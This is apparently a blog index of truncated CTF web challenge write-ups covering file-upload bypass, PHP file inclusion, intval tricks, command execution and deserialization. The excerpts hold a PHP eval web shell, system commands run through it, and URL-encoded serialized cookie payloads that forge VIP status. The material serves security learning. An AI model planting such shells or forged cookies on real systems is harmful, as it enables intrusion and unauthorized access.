Programmer Think

web151 1. Write a sentence and upload it It is found that the front end has verification <?php @eval($_POST[1]);?> Directly click on F12 2. Modify front-end verification You can upload successfully 3. Find flag on ant sword //Common commands: 1=system("ls /"); //Find root directory 1=system("ls ./"); //Find c ...

web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } See the include function in the source code. This means that the php file is imported from the outside and executed. If the execution is unsuccessful, the source code of the file is returned.The get parameter of the file ...

php features Reference blogs are still Nanshen blog web89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } Here is an intval function: get the integer value of the variab ...

There may be a lot of nonsense. It mainly records the process of finding loopholes from so many files Reference blog https://blog.csdn.net/rfrder/article/details/113924013 https://blog.csdn.net/miuzzx/article/details/111352849 https://rainy-autumn.top/archives/913 web301 Audit the loopholes written by the group leader three years ago se ...

Nanshen blog Command execution web29 preg_match : Match regular expression After pattern separator"i"Tag this is a case insensitive search In mode\b Mark a word boundary, so only independent words will be matched, such as: if (preg_match("/\bweb\b/i", "PHP is the web scripting language of choice.")) : True if (preg_matc ...

web254 ?username=xxxxxx&password=xxxxxx web255 cookie: user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D web256 cookie: O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22a%22%3Bs%3A8%3A%22password%22 ...